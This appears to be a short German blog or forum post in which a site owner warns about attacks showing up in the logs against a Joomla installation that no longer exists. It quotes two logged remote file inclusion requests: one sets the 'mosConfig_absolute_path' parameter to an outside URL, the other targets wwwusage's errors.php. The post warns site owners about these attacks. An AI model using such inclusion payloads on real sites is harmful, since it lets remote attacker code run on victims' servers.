Im momment sind in meinem Log mönströse attacken auf die nicht mehr vorhandene Joomla installation zu finden. Dabei habe ich wirklich interessante Perl-Skripte gefunden. I keep you updated.
Achtet dabei vor allen Dingen:
?mosConfig_absolute_path=http://asdsdjals.com/test.txt?
Auch wwwusage scheint im Angriff zu sein:
/wwwusage//errors.php?http://meine.domain.de/sdfsd.txt